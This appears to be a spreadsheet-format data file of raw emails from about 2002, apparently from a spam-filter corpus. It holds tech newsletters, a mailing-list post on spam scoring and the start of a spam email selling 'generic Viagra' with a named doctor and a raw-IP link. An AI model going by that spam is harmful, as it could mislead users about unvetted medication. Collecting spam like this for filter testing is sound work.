 simple moral or criminal issue. &amp;quot;Common sense&amp;quot; tells a lot of
 people that copying music without paying for it is just like
 stealing someone's car, and represents a loss to the owner. But if
 common sense could decide the issue equitably, we wouldn't have
 the law in the first place. Most of our great intellectual
 systems, including not only law but science, are designed in large
 part to overcome the errors of common sense, and that is more the
 case in civil law than criminal. The people who work within those
 systems are well aware of that, but they are also well aware that
 most people aren't - and that it can work to their advantage. Any
 time a highly paid civil attorney begins by telling you that an
 issue vital to his client is actually very simple, or just a
 matter of common sense, there's a very high probability that what
 he means is that it's to his clients advantage if people like you
 believe that. If it really WERE that simple, the client wouldn't
 be paying him as much as he is.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 class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;A BOOK FOR EVERY GEEK:&lt;/b&gt; Want to know more about &lt;a href="http://www.gnometomes.com/tome/001826.html"&gt;networking&lt;/a&gt;? Have you ever wanted to &lt;a href="http://www.gnometomes.com/tome/001843.html"&gt;write an e-book&lt;/a&gt;? Maybe you need to polish your &lt;a href="http://www.gnometomes.com/tome/001829.html"&gt;Web design&lt;/a&gt; skills? Get full-length books from the Poor Richard's series, including &lt;b&gt;Poor Richard's E-mail Publishing&lt;/b&gt;, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. &lt;a href="http://www.gnometomes.com"&gt;Click here&lt;/a&gt; to learn more.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;B&gt;My Virtual Model&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.myvirtualmodel.com/"&gt;http://www.myvirtualmodel.com/&lt;/A&gt;
 &lt;P&gt;
 {Make a model of you} Wouldn't it be cool if you could physically
 walk into cyberspace? Well, you can't... so stop thinking about
 it. However, you can design a virtual model of yourself on this
 site. Choose your features like body shape, eyes, nose, lips,
 facial hair, height, and weight. The amazing thing is how closely
 your model resembles you. My only complaint is that you can't add
 glasses. How in the heck is my digital doppelganger supposed to
 see? Once you're finished, the site can even offer style advice
 for your body type. (I'll stick with plaid, thank you very much.)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size="1"&gt;&lt;B&gt;Our Tip eBooks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000628.html"&gt;Microsoft Office Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000627.html"&gt;PC Productivity Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000626.html"&gt;Cool Internet Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000625.html"&gt;Windows 2000 Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000623.html"&gt;Windows XP Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001106.html"&gt;Top 50 Fun Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001104.html"&gt;Must-Know Terms&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001105.html"&gt;Top 50 Useful Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001099.html"&gt;Top 75 Tech Sites&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 Who has no trouble with controling his codes? Lockergnomie Wayne
 Smith: &amp;quot;Here is a bit of information specifically for Hotmail
 users who may have trouble opening your links, due to the service
 wanting to place the referred URL in a separate frame. I receive
 my Lockergnome newsletters via Hotmail and find it really useful
 when you folks include the link as text. However, sometimes this
 isn't practical - or it stops the flow of the article. The trouble
 here is that the link sometimes returns the message: 'There was an
 error displaying this link' in the frame. No problem! Right-click,
 copy shortcut, paste to metapad (freeware from LIQUIDNINJA.COM),
 then do a global search and replace. The trick is to replace the
 control codes with the correct characters: %26 is an ampersand;
 %3a is a colon; %2e is a period; %20 is a blank space; %2f is a
 forward slash; %3d is an equals symbol; %3f is a question mark.
 The Windows character map can help with any others. Select a
 character, look at the status bar, replace 'U+[code]' with the
 percent sign. In other words, the ampersand (U+0026) is %26 which
 translastes into a '&amp;amp;' symbol. Maybe a more clever Gnomie can come
 up with some script which we can place in the 'Web' folder,
 correctly register, and use in IE's right-click / context menu?&amp;quot;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href="http://www.lockergnome.com/issues/daily/20020712.html"&gt;http://www.lockergnome.com/issues/daily/20020712.html&lt;/a&gt;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HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;MP3 SOFTWARE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=548557/"&gt;Havas MP3 Pro&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=234527/"&gt;Magix MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=278075/"&gt;Ejay MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=468032/"&gt;Audiostation 5.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=588415/"&gt;Jack The MP3 Ripper&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=599956/"&gt;Pearson MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=472433/"&gt;Steinberg My MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=555517/"&gt;MusicMatch Jukebox 7.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=20635/"&gt;Hip Hop E-jay Record&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=393896/"&gt;MP3-Wolf&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=409500/"&gt;MP3 Maker Gold&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=273932/"&gt;The MP3 Wizard&lt;/A&gt;&lt;BR&gt;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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/lone.shoe.WMV"&gt;The Lone Shoe&lt;/a&gt;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Beefier Vinyl  --&gt;
 I'd feel better about doctors if it wasn't called a 'Practice.'
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Bart Schaefer said:
 &gt; This is off the topic of the rest of this discussion, but amavisd (in all
 &gt; its incarnations) and MIMEDefang and several other MTA plugins all reject
 &gt; at SMTP time messages that scores higher than some threshold (often 10).  
 argh, they do not, do they?   the FPs must be just gigantic :(
 &gt; If some new release were to start scoring all spam no higher than 5.1,
 &gt; there'd better be _zero_ FPs, because all those filters would drop their
 &gt; thresholds to 5.
 Well, my point is more that we should aim our rescoring algorithm so that
 a spam hits 5.0.    Any higher does us no good, as it means an FP is
 a lot harder to recover from, using compensation rules.
 Spams *will* hit higher than that -- that's just the way the scoring works.
 but for our code to be effective, and spread the range of scores
 correctly, we just have to optimise to hit 1 threshold.
 --j.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</si>
  <si>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Halley: "When is someone going to create _audio fonts_ for
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:6:16:41PM
 Date: Tue, 24 Sep 2002 01:16:41 GMT
 Halley[1]: "When is someone going to create _audio fonts_ for Christ's sake."
 [1] http://halleyscomment.blogspot.com/2002_09_22_halleyscomment_archive.html#85483723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</si>
  <si>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href="http://clickthru.online.com/Click?q=e2-J1OpQhyzid1CKDqENBEZdihv9KnR"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href="http://clickthru.online.com/Click?q=f7-N0QnQLgzok63jWHlrZIGiR6ImOeR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CDzTRoQNv0T0QkY6b7PR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdArfPRVUWuo4I9yc99NcnR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzFSlDTPRUQ93KjZ6eJcneR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpI6SWLkdPAu7hgvo2AKesR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav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href="http://clickthru.online.com/Click?q=61-x9oAIoLj9fatbFb4JYndFK-AWlFR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3_dd7Ti1okYP2r70U69R" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y_jEu6YSEYIEElDh4B1rR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqXHDVsDPUByjw2PB1s7iR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U7vHrLZfZ1PHq15ZNEEZPR"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10,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href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcz1TnqNyXYHRf_uaHkrR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8813.50 &amp;nbsp;&lt;font color=#cc0000&gt;-282.59&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDH017GGwkkPhB7mxUT9AiR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1346.01 &amp;nbsp;&lt;font color=#cc0000&gt;-35.11&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwx12fsoux6DmLwgkaZmRPR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;920.47 &amp;nbsp;&lt;font color=#cc0000&gt;-32.36&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscnuQ3lMBwhq6GOxuYznR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;965.29 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-26.23&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- VISION PROMO --&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;CNET News.com Vision Series&lt;/b&gt;&lt;br&gt;Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5y5Y5-f1xmYgHobjqmeR" &gt;Vision Series home&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- /VISION PROMO --&gt;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 stocks drop again on Qwest criminal probe news&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Word telecom Qwest Communications International is being investigated by the U.S. Attorney's office in Denver helped send technology shares lower Wednesday.
 &lt;p&gt;
 Despite a Merrill Lynch upgrade of Cisco Systems and the fact that J.P. Morgan began coverage on AOL Time Warner with a "buy" rating, CNET's Tech index fell 26.23 points, or 2.66 percent, to 965.29. The tech-heavy Nasdaq composite index lost 35.11 points, or 2.54 percent, to 1,346.01--a multi-year low.
 &lt;p&gt;
 Broader markets also shed value, dragged down in part by a troubled pharmaceutical sector. The Dow Jones industrial average dropped 282.5 points, or 3.11 percent, to 8,813.5, and the S&amp;P 500 slid 32.36 points, or 3.52 percent, to 920.47--also a multi-year low.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href="http://clickthru.online.com/Click?q=34-pJpSIcd819B4rhq3_tvVyn4IcgyR" &gt;AT&amp;T, Comcast Shareholders OK Broadband Deal &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Shareholders of AT&amp;T Corp. and Comcast Corp. on Wednesday approved the planned $27 billion merger of AT&amp;T Broadband with Comcast, which will create the nation's largest cable TV operator with more than 22 million customers.
 Telephone giant AT&amp;T in December agreed to sell its cable television unit to Comcast as part of a restructuring that dismantled its vision of becoming a one-stop shop for telephone, data and video services.&lt;br&gt;&lt;B&gt;AT&amp;T CORP 9.78 -2.30% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSenC10zjVX4RVXFO5JSFR" &gt;$215 million later, start-up Pluris shuts down &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Networking start-up Pluris will release a statement Wednesday announcing it has closed its doors because of a lack of funding and ongoing woes in the market it serves, according to a spokeswoman familiar with the company's plans.
 Pluris, a once promising company, burned through $215 million over the past few years as it attempted to build a high-end router that was intended to outclass similar products from competitors such as Juniper Networks and Cisco Systems.&lt;br&gt;&lt;B&gt;CISCO SYSTEMS 13.51 2.82% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2Fzc7al6fez6pa6cIJuR" &gt;WorldCom contracts under U.S. scrutiny &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 The accounting scandal at WorldCom has prompted U.S. government agencies to scrutinize the telecommunications company's billions of dollars in federal contracts.
 The Federal Aviation Administration, for one, has been forced to take stock of the situation quickly. WorldCom is a finalist for a 20-year, $3.5 billion contract with the FAA. The contract is expected to be awarded as soon as this week. The company is the incumbent on the contract, which supplies phone and data infrastructure to the nation's air traffic control systems.&lt;br&gt;&lt;B&gt;WORLDCOM INC-WORLDCOM TRCK STK 0.20 -3.81%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href="http://clickthru.online.com/Click?q=74-VAV8IZZSN6A6Wn0RYG8Y0gSPZxsR"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href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVDWD5ykUMBXB6W5WWlR" &gt;Banc of America Securities lowers estimates and price target on IBM in notes 7/10/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Joel Wagonfeld argues the computer giant is not immune to the persistent, widespread weakness in IT spending. But a roughly 6 percent dip in revenues during the second quarter will be offset by the elimination of losses from the discontinued hard disk drive business, Wagonfeld predicts. In IBM's second-quarter results, he expects continued weakness in hardware but relative strength in software and outsourcing. The company's decision to exit or restructure unprofitable, commodity businesses is sound, Wagonfeld says. He reiterates a "buy" rating on IBM.&lt;br&gt;&lt;B&gt;INTL BUSINESS MACHINES 68.76 -1.31% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJGPlW7jHSCN0U7nQUD4R"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href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeTEqynAE64qDAwrPGrR" &gt;Pressplay CEO Schuon to leave company&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Andy Schuon is leaving as president and chief executive officer of Pressplay, a joint online venture between Sony Music and Universal Music, sources close to the matter said on Wednesday.
 Sony Music is a unit of Sony Corp, and Universal Music is a unit of Vivendi Universal.&lt;br&gt;&lt;B&gt;SONY CORP ADR 50.47 -4.32% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDm4iygMKE-nFr99H2iR"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href="http://clickthru.online.com/Click?q=de-7tpkQMWaO-_Q5E_tTbDS-BJjho4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwj9BmISgCs3CyJqsjeorR"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href="http://clickthru.online.com/Click?q=08-IFoQIRjFUlrv0mOg3F-erCpGY9iR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF7vBeQKORl28NRQSnqQPR"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href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3Y499BDFWVhZSgRXBnR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH1jj2TNNOiJGu_NEsnEuR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPblY751U53xlZk0f-IosR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHlVz9LqwuBXvl3NU2FR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonnAOpszSjaeTldfVpf4R" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2p6pzmP0dAVJ9PZAKTrR"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href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dzAP7PJVr9i_f_B0NLnlR"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href="http://clickthru.online.com/Click?q=c6-URF9QMLKguZvu7xWdT_pfmeDx04R" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6mDfsBmvpmtTwxp6DtrR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=f0-nvVDrQg8JnbPCuclfqaFOt4zzz0_jN9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRMaz-NZfnODtxI8fiiPR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6wztbpId5q0_HZB17WnR"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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAaBl8Q5P26D_8gaZjMeR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMOhuggEMLKlXBDgnVsR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMGrqJbf24YOLpk6Td6dR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbBAQPc03RXvLF34ULXuR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tyg7J3vUZsihsBSWgp7yR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjOeC53W2H3f2jvrqULlR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ae-jOB6-tBFPYl11aobN1Uo198IkRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: What your wife wants for Christmass
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 	&lt;head&gt;
 		&lt;meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"&gt;
 		&lt;title&gt;Buy Generic Sildenafil Citrate Online (the active ingredient in Viagra(R))&lt;/title&gt;
 	&lt;/head&gt;
 	&lt;body bgcolor="#f5f5f5" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="blue" vlink="blue" alink="blue"&gt;
 		&lt;div align="center"&gt;
 			&lt;table border="0" cellpadding="1" cellspacing="1" bgcolor="black"&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="white"&gt;
 						&lt;table border="0" cellpadding="0" cellspacing="0" width="500"&gt;
 							&lt;tr&gt;
 								&lt;td valign="bottom" bgcolor="#0076b0"&gt;
 									&lt;table border="0" cellpadding="2" cellspacing="0" width="500"&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;font size="6" face="Verdana, Arial, Helvetica, sans-serif" color="#f8b262"&gt;&lt;b&gt;Generic&lt;/b&gt;&lt;/font&gt;&lt;font size="6" face="Verdana, Arial, Helvetica, sans-serif" color="white"&gt;&lt;b&gt; Viagra&lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="white" size="2"&gt;&lt;b&gt;&lt;br&gt;
 													&lt;/b&gt;&lt;/font&gt;&lt;font size="3" face="Verdana, Arial, Helvetica, sans-serif" color="black"&gt;&lt;b&gt;Value Drugstore&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 									&lt;/table&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="black"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#cccccc"&gt;
 									&lt;div align="left"&gt;
 										&lt;br&gt;
 									&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="black"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="231"&gt;
 								&lt;td height="231" valign="top" align="left" bgcolor="white"&gt;
 									&lt;div align="left"&gt;
 										&lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 											&lt;tr&gt;
 												&lt;td width="139" valign="top"&gt;
 													&lt;table border="0" cellpadding="0" cellspacing="2" width="556"&gt;
 														&lt;tr&gt;
 															&lt;td rowspan="3" width="12"&gt;&lt;/td&gt;
 															&lt;td colspan="2"&gt;
                                                             &lt;p align="center"&gt;&lt;br&gt;
 																&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;For the first time ever a generic equivalent to Viagra&amp;reg; is available. Generic Sildenafil Citrate (GSC-100) and Viagra&amp;reg; both consist of 100 mg of sildenafil citrate. GSC-100 is simply a generic version of Viagra&amp;reg; - just like ibuprofen is the generic name for Advil&amp;reg;. &lt;br&gt;
 																	&lt;br&gt;
 																&lt;a href="http://203.95.1.164/generic_viagra005/"&gt;&lt;b&gt;
                                                             Click here to visit 
                                                             our site&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;a href="http://203.95.1.164/generic_viagra005/"&gt;
                                                             &lt;/a&gt;&lt;/p&gt;
 																&lt;table width="239" border="0" cellspacing="0" cellpadding="0"&gt;
 																	&lt;tr&gt;
 																		&lt;td&gt;&lt;br&gt;
 																			&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Dr. Ves Kiril, MD.&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td&gt;&lt;font size="1" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;Director of Urological Services&lt;/font&gt;&lt;/td&gt;
